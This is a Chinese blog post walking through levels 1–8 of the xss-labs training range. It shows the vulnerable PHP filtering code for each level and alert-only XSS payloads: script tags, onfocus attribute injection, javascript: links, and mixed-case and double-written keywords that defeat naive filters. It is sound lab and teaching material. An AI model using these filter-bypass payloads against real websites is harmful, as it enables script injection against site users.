<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>xss靶场 | echozt</title><meta name="author" content="echozt"><meta name="copyright" content="echozt"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="前些时间把xss-labs的靶场练习了一下">
<meta property="og:type" content="article">
<meta property="og:title" content="xss靶场">
<meta property="og:url" content="https://echozt.github.io/posts/84ce.html">
<meta property="og:site_name" content="echozt">
<meta property="og:description" content="前些时间把xss-labs的靶场练习了一下">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://echozt.github.io/img/featureimages/7.jpg">
<meta property="article:published_time" content="2022-01-28T06:08:59.000Z">
<meta property="article:modified_time" content="2023-12-15T02:58:09.531Z">
<meta property="article:author" content="echozt">
<meta property="article:tag" content="靶场">
<meta property="article:tag" content="Web漏洞">
<meta property="article:tag" content="xss">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://echozt.github.io/img/featureimages/7.jpg"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="https://echozt.github.io/posts/84ce.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><script>
    (() => {
      
    const saveToLocal = {
      set: (key, value, ttl) => {
        if (!ttl) return
        const expiry = Date.now() + ttl * 86400000
        localStorage.setItem(key, JSON.stringify({ value, expiry }))
      },
      get: key => {
        const itemStr = localStorage.getItem(key)
        if (!itemStr) return undefined
        const { value, expiry } = JSON.parse(itemStr)
        if (Date.now() > expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return value
      }
    }

    window.btf = {
      saveToLocal,
      getScript: (url, attr = {}) => new Promise((resolve, reject) => {
        const script = document.createElement('script')
        script.src = url
        script.async = true
        Object.entries(attr).forEach(([key, val]) => script.setAttribute(key, val))
        script.onload = script.onreadystatechange = () => {
          if (!script.readyState || /loaded|complete/.test(script.readyState)) resolve()
        }
        script.onerror = reject
        document.head.appendChild(script)
      }),
      getCSS: (url, id) => new Promise((resolve, reject) => {
        const link = document.createElement('link')
        link.rel = 'stylesheet'
        link.href = url
        if (id) link.id = id
        link.onload = link.onreadystatechange = () => {
          if (!link.readyState || /loaded|complete/.test(link.readyState)) resolve()
        }
        link.onerror = reject
        document.head.appendChild(link)
      }),
      addGlobalFn: (key, fn, name = false, parent = window) => {
        if (!false && key.startsWith('pjax')) return
        const globalFn = parent.globalFn || {}
        globalFn[key] = globalFn[key] || {}
        if (name && globalFn[key][name]) return
        globalFn[key][name || Object.keys(globalFn[key]).length] = fn
        parent.globalFn = globalFn
      }
    }
  
      
      const activateDarkMode = () => {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      const activateLightMode = () => {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
        }
      }

      btf.activateDarkMode = activateDarkMode
      btf.activateLightMode = activateLightMode

      const theme = saveToLocal.get('theme')
    
          theme === 'dark' ? activateDarkMode() : theme === 'light' ? activateLightMode() : null
        
      
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        document.documentElement.classList.toggle('hide-aside', asideStatus === 'hide')
      }
    
      
    const detectApple = () => {
      if (/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)) {
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
  
    })()
  </script><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: undefined,
  copy: {
    success: '复制成功',
    error: '复制失败',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  dateSuffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'null',
  Snackbar: undefined,
  infinitegrid: {
    js: 'https://cdn.jsdelivr.net/npm/@egjs/infinitegrid/dist/infinitegrid.min.js',
    buttonText: '加载更多'
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: false,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'xss靶场',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2023-12-15 10:58:09'
}</script><meta name="generator" content="Hexo 5.4.1"><link rel="alternate" href="/atom.xml" title="echozt" type="application/atom+xml">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="/img/avatar.jpg" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">49</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">82</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">15</div></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url(/img/featureimages/7.jpg);"><nav id="nav"><span id="blog-info"><a class="nav-site-title" href="/"><img class="site-icon" src="/img/logo.png" alt="Logo"><span class="site-name">echozt</span></a><a class="nav-page-title" href="/"><span class="site-name">xss靶场</span></a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><div id="toggle-menu"><span class="site-page"><i class="fas fa-bars fa-fw"></i></span></div></div></nav><div id="post-info"><h1 class="post-title">xss靶场</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-01-28T06:08:59.000Z" title="发表于 2022-01-28 14:08:59">2022-01-28</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2023-12-15T02:58:09.531Z" title="更新于 2023-12-15 10:58:09">2023-12-15</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E4%B8%93%E9%A1%B9%E9%9D%B6%E5%9C%BA/">专项靶场</a></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title=""><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">浏览量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><p>前些时间把xss-labs的靶场练习了一下<span id="more"></span>，其实如果想练习靶场的话，可以是从xss先开始的，sqli练习的我还停留在第四关。xss总共20关，还是好理解一点的，下面是我的一些理解。</p>
<!--more-->

<h1 id="基本流程："><a href="#基本流程：" class="headerlink" title="基本流程："></a>基本流程：</h1><p>先输入一个payload，然后查看网页源码，先猜想一下，再去查看原php文件，验证猜想或者找到解题的关键。</p>
<p>提供一个直接查看源码的快捷方式：ctrl+U,</p>
<p>或者直接在网址前面输入view-source:   （一样的意思）我个人还是喜欢直接按ctrl+U的方式，比较方便。</p>
<h1 id="level-1"><a href="#level-1" class="headerlink" title="level 1"></a>level 1</h1><p>可以先查看第一关的源码，发现直接将值传递过去了</p>
<p>在level1.php中：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token variable">$str</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">"name"</span><span class="token punctuation">]</span><span class="token punctuation">;</span>  
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>直接将键盘的值传送给了后台</p>
<h2 id="payload"><a href="#payload" class="headerlink" title="payload:"></a>payload:</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h1 id="level-2"><a href="#level-2" class="headerlink" title="level 2"></a>level 2</h1><h2 id="尝试"><a href="#尝试" class="headerlink" title="尝试:"></a>尝试:</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>发现没有成功，查看一下源码：</p>
<img src="/posts/84ce/2.png" class>png)

<p>&lt;和&gt;都被编码成了html字符实体。</p>
<p>在level2.php中：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token keyword">echo</span> <span class="token string">"&lt;h2 align=center>没有找到和"</span><span class="token punctuation">.</span><span class="token function">htmlspecialchars</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token string">"相关的结果.&lt;/h2>"</span><span class="token punctuation">.</span>'<span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>center</span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>htmlspecialchars()函数对变量str进行处理之后显示到网页上。(即将&lt;和&gt;都被编码成了html字符实体）但value中并没有使用。</p>
<h2 id="payload-1"><a href="#payload-1" class="headerlink" title="payload:"></a>payload:</h2><pre class="line-numbers language-php"><code class="language-php">"<span class="token operator">></span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span><span class="token comment" spellcheck="true">//</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p> 闭合前面的，注释后面的。</p>
<h1 id="level-3"><a href="#level-3" class="headerlink" title="level 3"></a>level 3</h1><h2 id="尝试："><a href="#尝试：" class="headerlink" title="尝试："></a>尝试：</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>发现没有成功，查看一下源码：</p>
<img src="/posts/84ce/3.png" class>

<p>在level3.php中：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token keyword">echo</span> <span class="token string">"&lt;h2 align=center>没有找到和"</span><span class="token punctuation">.</span><span class="token function">htmlspecialchars</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token string">"相关的结果.&lt;/h2>"</span><span class="token punctuation">.</span>"<span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>center</span><span class="token punctuation">></span></span></span>

<span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>input</span> <span class="token attr-name">name</span><span class="token attr-value"><span class="token punctuation">=</span>keyword</span>  <span class="token attr-name">value</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">'</span><span class="token punctuation">"</span>.htmlspecialchars($str).<span class="token punctuation">"</span><span class="token punctuation">'</span></span><span class="token punctuation">></span></span></span>    
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>两处都使用了htmlspecialchars()函数，就不能使用带有&lt;或&gt;</p>
<h2 id="payload-2"><a href="#payload-2" class="headerlink" title="payload:"></a>payload:</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token string">'onfocus=javascript:alert('</span>xss'<span class="token punctuation">)</span><span class="token comment" spellcheck="true">//</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>在使用之后，当使用鼠标点击该输入框时输入框被选中可以。</p>
<h1 id="level-4"><a href="#level-4" class="headerlink" title="level 4"></a>level 4</h1><h2 id="尝试：-1"><a href="#尝试：-1" class="headerlink" title="尝试："></a>尝试：</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>发现没有成功，查看一下源码：</p>
<img src="/posts/84ce/4.png" class>

<p>在level4.php中：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token variable">$str2</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">">"</span><span class="token punctuation">,</span><span class="token string">""</span><span class="token punctuation">,</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">;</span>    <span class="token shell-comment comment">#将变量中的>删除</span>

<span class="token variable">$str3</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"&lt;"</span><span class="token punctuation">,</span><span class="token string">""</span><span class="token punctuation">,</span><span class="token variable">$str2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>   <span class="token shell-comment comment">#将变量中的&lt;删除</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>不能使用带有&lt;或&gt;,还是可以使用第三关的题解。</p>
<h2 id="payload-3"><a href="#payload-3" class="headerlink" title="payload:"></a>payload:</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token string">'onfocus=javascript:alert('</span>xss'<span class="token punctuation">)</span><span class="token comment" spellcheck="true">//</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>在使用之后，当使用鼠标点击该输入框时输入框被选中可以。</p>
<h1 id="level-5"><a href="#level-5" class="headerlink" title="level 5"></a>level 5</h1><h2 id="尝试1："><a href="#尝试1：" class="headerlink" title="尝试1："></a>尝试1：</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>发现没有成功，查看一下源码：</p>
<img src="/posts/84ce/5.png" class>

<h2 id="尝试2"><a href="#尝试2" class="headerlink" title="尝试2"></a>尝试2</h2><pre class="line-numbers language-php"><code class="language-php">onfocus<span class="token operator">=</span>javascript<span class="token punctuation">:</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>发现也未成功，查看一下源码：</p>
<img src="/posts/84ce/5_2.png" class>

<p>在level5.php中：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token variable">$str</span> <span class="token operator">=</span> <span class="token function">strtolower</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">"keyword"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>   <span class="token shell-comment comment">#将值进行全小写的转换，然后赋值给str变量。</span>

<span class="token variable">$str2</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"&lt;script"</span><span class="token punctuation">,</span><span class="token string">"&lt;scr_ipt"</span><span class="token punctuation">,</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$str3</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"on"</span><span class="token punctuation">,</span><span class="token string">"o_n"</span><span class="token punctuation">,</span><span class="token variable">$str2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>   
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>通过str_replace()函数来破坏变量值中的敏感字符的语义。</p>
<p>不能用带有script和on的payload</p>
<h2 id="payload-4"><a href="#payload-4" class="headerlink" title="payload:"></a>payload:</h2><pre class="line-numbers language-php"><code class="language-php">"<span class="token operator">></span><span class="token markup">&lt;a href=javascript:alert('xss')></span>xss<span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>a</span><span class="token punctuation">></span></span></span><span class="token comment" spellcheck="true">//</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h1 id="level-6"><a href="#level-6" class="headerlink" title="level 6"></a>level 6</h1><h2 id="尝试1"><a href="#尝试1" class="headerlink" title="尝试1"></a>尝试1</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h2 id="尝试2-1"><a href="#尝试2-1" class="headerlink" title="尝试2"></a>尝试2</h2><pre class="line-numbers language-php"><code class="language-php">onfocus<span class="token operator">=</span>javascript<span class="token punctuation">:</span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h2 id="尝试3"><a href="#尝试3" class="headerlink" title="尝试3"></a>尝试3</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token markup">&lt;a href=javascript:alert('xss')></span>xss<span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>a</span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>查看源码，错误原因和level 5一样</p>
<p>在level6.php中：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token variable">$str2</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"&lt;script"</span><span class="token punctuation">,</span><span class="token string">"&lt;scr_ipt"</span><span class="token punctuation">,</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$str3</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"on"</span><span class="token punctuation">,</span><span class="token string">"o_n"</span><span class="token punctuation">,</span><span class="token variable">$str2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$str4</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"src"</span><span class="token punctuation">,</span><span class="token string">"sr_c"</span><span class="token punctuation">,</span><span class="token variable">$str3</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$str5</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"data"</span><span class="token punctuation">,</span><span class="token string">"da_ta"</span><span class="token punctuation">,</span><span class="token variable">$str4</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$str6</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"href"</span><span class="token punctuation">,</span><span class="token string">"hr_ef"</span><span class="token punctuation">,</span><span class="token variable">$str5</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>不能使用以上字符，但没转化成小写，因此可以利用大小写混写来绕过</p>
<h2 id="payload-5"><a href="#payload-5" class="headerlink" title="payload:"></a>payload:</h2><pre class="line-numbers language-php"><code class="language-php">"<span class="token operator">></span><span class="token markup">&lt;a HrEf=javascript:alert('xss')></span>xss<span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>a</span><span class="token punctuation">></span></span></span><span class="token comment" spellcheck="true">//</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>其他的大小写混写一样也可以</p>
<h1 id="level-7"><a href="#level-7" class="headerlink" title="level 7"></a>level 7</h1><h2 id="尝试：-2"><a href="#尝试：-2" class="headerlink" title="尝试："></a>尝试：</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>查看网页源码：</p>
<img src="/posts/84ce/7.png" class>

<p>尝试其他的语句，也是出现这种情况</p>
<p>在level7.php中：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token variable">$str</span> <span class="token operator">=</span><span class="token function">strtolower</span><span class="token punctuation">(</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">"keyword"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>         <span class="token shell-comment comment">#将参数值转换成小写</span>

<span class="token variable">$str2</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"script"</span><span class="token punctuation">,</span><span class="token string">""</span><span class="token punctuation">,</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">;</span>         <span class="token shell-comment comment">#将基本的关键词都删掉</span>

<span class="token variable">$str3</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"on"</span><span class="token punctuation">,</span><span class="token string">""</span><span class="token punctuation">,</span><span class="token variable">$str2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$str4</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"src"</span><span class="token punctuation">,</span><span class="token string">""</span><span class="token punctuation">,</span><span class="token variable">$str3</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$str5</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"data"</span><span class="token punctuation">,</span><span class="token string">""</span><span class="token punctuation">,</span><span class="token variable">$str4</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$str6</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"href"</span><span class="token punctuation">,</span><span class="token string">""</span><span class="token punctuation">,</span><span class="token variable">$str5</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>此时可使用双写关键字，</p>
<h2 id="payload-6"><a href="#payload-6" class="headerlink" title="payload:"></a>payload:</h2><pre class="line-numbers language-php"><code class="language-php">"oonnfocus<span class="token operator">=</span>javascriscriptpt<span class="token punctuation">:</span><span class="token function">alert</span><span class="token punctuation">(</span>‘xss’<span class="token punctuation">)</span><span class="token comment" spellcheck="true">//</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>其实就是只要关键字”on” “script”等包含在那个里面，它删掉一个之后，还会保留一个，就可以实现绕过</p>
<h1 id="level-8"><a href="#level-8" class="headerlink" title="level 8"></a>level 8</h1><h2 id="尝试1：-1"><a href="#尝试1：-1" class="headerlink" title="尝试1："></a>尝试1：</h2><pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>script</span><span class="token punctuation">></span></span></span><span class="token function">alert</span><span class="token punctuation">(</span><span class="token string">'xss'</span><span class="token punctuation">)</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>script</span><span class="token punctuation">></span></span></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>网页源码为：</p>
<img src="/posts/84ce/8.png" class>

<h2 id="尝试2-2"><a href="#尝试2-2" class="headerlink" title="尝试2:"></a>尝试2:</h2><pre class="line-numbers language-php"><code class="language-php">javascript<span class="token punctuation">:</span><span class="token function">alert</span><span class="token punctuation">(</span>‘xss’<span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>查看网页源码发现破坏了语义：</p>
<img src="/posts/84ce/8_2.png" class>

<p>在level8.php中：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token variable">$str</span> <span class="token operator">=</span> <span class="token function">strtolower</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">"keyword"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>      <span class="token shell-comment comment">#将参数值转换成小写</span>

<span class="token variable">$str2</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"script"</span><span class="token punctuation">,</span><span class="token string">"scr_ipt"</span><span class="token punctuation">,</span><span class="token variable">$str</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$str3</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"on"</span><span class="token punctuation">,</span><span class="token string">"o_n"</span><span class="token punctuation">,</span><span class="token variable">$str2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$str4</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"src"</span><span class="token punctuation">,</span><span class="token string">"sr_c"</span><span class="token punctuation">,</span><span class="token variable">$str3</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$str5</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"data"</span><span class="token punctuation">,</span><span class="token string">"da_ta"</span><span class="token punctuation">,</span><span class="token variable">$str4</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$str6</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">"href"</span><span class="token punctuation">,</span><span class="token string">"hr_ef"</span><span class="token punctuation">,</span><span class="token variable">$str5</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token variable">$str7</span><span class="token operator">=</span><span class="token function">str_replace</span><span class="token punctuation">(</span><span class="token string">'"'</span><span class="token punctuation">,</span><span class="token string">'"'</span><span class="token punctuation">,</span><span class="token variable">$str6</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="payload-7"><a href="#payload-7" class="headerlink" title="payload:"></a>payload:</h2><p>将unicode编码转换成ASCII码，即将javascript:alert(‘xss’)转换成ASCII码即可</p>
